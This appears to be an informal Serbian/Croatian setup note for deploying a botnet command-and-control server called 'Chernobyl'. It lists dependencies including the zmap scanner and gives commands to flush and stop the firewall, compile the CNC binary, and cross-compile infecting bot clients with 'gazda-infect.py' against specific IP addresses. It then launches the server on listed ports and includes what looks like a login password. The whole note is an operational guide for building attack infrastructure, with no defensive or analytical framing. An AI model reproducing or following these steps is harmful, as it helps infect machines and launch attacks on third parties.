

Nakon ubacivanja fajlova staviti chmod 777 *
- Obavezno nakon zavrsetka svega cele installacije pokrenuti python killfix.py
- kopiraj payload DEBILU MRTVI
kopiraj payload DEBILU MRTVI
kopiraj payload DEBILU MRTVI
kopiraj payload DEBILU MRTVI

167.71.45.197

1 Installing Dependencies
yum install gcc screen nano httpd python perl python-paramiko iptables-services bzip2 wget golang zmap mariadb-server -y; ulimit -n 999999


2 Stopping Iptables
iptables -F; service iptables stop


3 Edit Client Side (chernobyl-metode.c) ostaviti svoj ip botneta.

4 Compiling Serverside
gcc chernobyl-cnc.c -o CHERNOBYLV05 -pthread


5 Making Login Credentials <-- ne mora ima vec login.txt samo se svi fajlovi ubace
nano login.txt

sta ti treba jos zmap jel treba msm da da jel ne dolazi

6 Cross Compiling
python gazda-infect.py chernobyl-metode.c 134.209.231.141 < -- zameniti ip sa svojim od masine


7 Starting Serverside
gazdapero1312eAe
screen ./CHERNOBYLV05 606 850 1337  

8. drzati ctrl + a + d da detachujete screen. finish !



 



kopiraj payload DEBILU MRTVI